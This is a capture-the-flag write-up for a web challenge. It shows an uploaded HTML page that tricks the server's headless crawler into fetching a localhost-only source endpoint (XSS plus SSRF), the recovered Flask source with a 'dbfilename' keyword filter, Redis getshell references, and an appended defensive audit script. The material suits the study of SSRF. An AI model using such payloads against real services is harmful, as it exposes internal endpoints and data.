[web]spider-jaivy

xp0int, Posted on Aug 25 2018

## spider(web)-jaivy

A dynamic crawler challenge, Redis getshell. Port 8000 runs apache2.

http://3d0666de57964c4b865e02e4088a14ac5b0522f7daa94075.game.ichunqiu.com/

![image](https://leanote.com/api/file/getImage?fileId=5b7a989aab64412a5900212f)

Directory scanning turned up robots.txt, which revealed the path get_sourcecode. Visiting it:

![image](https://leanote.com/api/file/getImage?fileId=5b7a98a5ab64412a59002130)

Modifying the HTTP headers had no effect either.

In the end it turned out to be XSS + SSRF: the server's own crawler renders the uploaded page, so a script inside it can fetch the source from localhost. The file-reading script, uploaded as 4.html:

```html
<html>
<head></head>
<body>
<script>
// The headless browser runs on the server, so this request comes from 127.0.0.1
var url = "http://127.0.0.1/get_sourcecode";
var aaa = new XMLHttpRequest();
aaa.open("GET", url, false);
aaa.onreadystatechange = function () {
    if (aaa.readyState == 4) {
        // Render the response into the page so it can be read back
        var a = document.createElement("a");
        a.innerHTML = aaa.responseText;
        document.body.appendChild(a);
    }
};
aaa.send();
</script>
</body>
</html>
```

The source can now be read:

![image](https://leanote.com/api/file/getImage?fileId=5b7a98b7ab64412a59002131)

The source obtained (Python 2, as served by the challenge):

```python
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from flask import Flask, request
from flask import render_template
import os
import uuid
import tempfile
import subprocess
import time
import json

app = Flask(__name__, static_url_path='')


def proc_shell(cmd):
    # Run a command with its stdout spooled to a temp file, killing it after 30 s
    out_temp = tempfile.SpooledTemporaryFile(bufsize=1000*1000)
    fileno = out_temp.fileno()
    proc = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=fileno, shell=False)
    start_time = time.time()
    while True:
        if proc.poll() == None:
            if time.time() - start_time > 30:
                proc.terminate()
                proc.kill()
                proc.communicate()
                out_temp.seek(0)
                out_temp.close()
                return
            else:
                time.sleep(1)
        else:
            proc.communicate()
            out_temp.seek(0)
            data = out_temp.read()
            out_temp.close()
            return data


def casperjs_html(url):
    # Render the URL in a headless browser and collect every resource it requested
    cmd = 'casperjs {0} --ignore-ssl-errors=yes --url={1}'.format(os.path.dirname(__file__) + '/casper/casp.js', url)
    cmd = cmd.split(' ')
    stdout = proc_shell(cmd)
    try:
        result = json.loads(stdout)
        links = result.get('resourceRequestUrls')
        return links
    except Exception, e:
        return []


@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        return render_template('index.html')
    else:
        f = request.files['file']
        filename = str(uuid.uuid1()) + '.html'
        basepath = os.path.dirname(__file__)
        upload_path = os.path.join(basepath, 'static/upload/', filename)
        content = f.read()
        #hint
        if 'level=low_273eac1c' not in content and 'dbfilename' in content.lower():
            # msg text: "Warning: malicious keyword found"
            return render_template('index.html', msg=u'Warning: 发现恶意关键字')
        #hint
        with open(upload_path, 'w') as f:
            f.write(content)
        # The uploaded page is crawled via the loopback interface
        url = 'http://127.0.0.1:80/upload/'+filename
        links = casperjs_html(url)
        links = '\n'.join(links)
        if not links:
            links = 'NULL'
        links = 'URL: '+url+'\n'+links
        return render_template('index.html', links=links)


@app.route('/get_sourcecode', methods=['GET', 'POST'])
def get_code():
    if request.method == 'GET':
        # Only the source IP is checked, which the local crawler satisfies
        ip = request.remote_addr
        if ip != '127.0.0.1':
            return 'NOT 127.0.0.1'
        else:
            with open(os.path.dirname(__file__)+'/run.py') as f:
                code = f.read()
            return code
    else:
        return ''


@app.errorhandler(404)
def page_not_found(error):
    return '404'


@app.errorhandler(500)
def internal_server_error(error):
    return '500'


@app.errorhandler(403)
def unauthorized(error):
    return '403'


if __name__ == '__main__':
    pass
```

Articles I referenced while solving this:

https://strcpy.me/index.php/archives/751/
https://zhuanlan.zhihu.com/p/36529010
https://www.anquanke.com/post/id/156377
https://lorexxar.cn/2016/12/03/redis-getshell/
https://xz.aliyun.com/t/1800
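The weak point in the source above is that `/get_sourcecode` trusts `request.remote_addr == '127.0.0.1'`, while the service deliberately points its own headless browser at `http://127.0.0.1:80/upload/...`, so any script in an uploaded page reaches internal endpoints from the trusted address. One thing a defender can do with the `resourceRequestUrls` list the crawler already reports is audit it for fetches that went to loopback, private or link-local destinations, or to non-HTTP schemes. The following is an added example, not code from the writeup or the challenge: it assumes the crawler report is a plain list of URL strings, uses only the standard library, and takes an optional resolver callable so that the check stays offline; the sample report and the name-to-address mapping are constructed for this example.

```python
"""Audit a headless-crawler resource report for internal-network fetches.

Added example; the URL list and resolver mapping below are constructed.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Names that are loopback by convention; no DNS lookup is done for them.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}


def _parse_literal(host):
    """Return an ip_address for a literal host, unmapping ::ffff:a.b.c.d, else None."""
    if not host:
        return None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not a canonical literal (a hostname, or a shorthand the browser may
        # accept but ipaddress does not): the caller must resolve it.
        return None
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr


def _is_internal(addr):
    """True for addresses a crawler running inside the server network must not reach."""
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast)


def classify_url(url, resolve=None):
    """Classify one requested URL as 'ok', 'internal', 'blocked-scheme' or 'unresolved'.

    resolve, if given, maps a hostname to an address string (or None). Without
    it, only literal addresses can be judged; names come back 'unresolved' so a
    DNS-aware stage can decide (resolve, apply the same test, pin the result).
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "blocked-scheme"
    host = parts.hostname  # lowercased, brackets stripped from IPv6 literals
    if not host:
        return "unresolved"
    if host in LOOPBACK_NAMES:
        return "internal"
    literal = _parse_literal(host)
    if literal is None and resolve is not None:
        literal = _parse_literal(resolve(host))
    if literal is None:
        return "unresolved"
    return "internal" if _is_internal(literal) else "ok"


def audit_crawl_report(links, resolve=None):
    """Group a crawler's reported URLs by classification."""
    report = {"ok": [], "internal": [], "blocked-scheme": [], "unresolved": []}
    for link in links:
        report[classify_url(link, resolve)].append(link)
    return report


# Constructed sample: what a resourceRequestUrls report could look like after
# rendering an uploaded page like the one in the writeup.
SAMPLE_REPORT = [
    "http://127.0.0.1:80/upload/4.html",
    "http://127.0.0.1/get_sourcecode",
    "https://example.com/static/app.js",
    "http://[::1]:8000/",
    "http://10.0.0.5/",
    "http://intranet-host/",
    "http://[::ffff:127.0.0.1]/",
    "ftp://127.0.0.1/",
    "http://unknown-host/",
]

# Constructed name-to-address mapping standing in for a real resolver.
SAMPLE_RESOLVER = {
    "example.com": "93.184.216.34",
    "intranet-host": "192.168.1.20",
}


if __name__ == "__main__":
    for category, urls in audit_crawl_report(SAMPLE_REPORT, SAMPLE_RESOLVER.get).items():
        for u in urls:
            print("%-15s %s" % (category, u))
```

Note that the crawl base URL itself lands in the `internal` bucket: the design runs the browser on the same host as the endpoints it must not reach, so this audit can only detect abuse after the fact. The actual fix is to keep the crawler off the service's network (or to authenticate `/get_sourcecode` with something the crawler cannot supply) rather than to trust a source address.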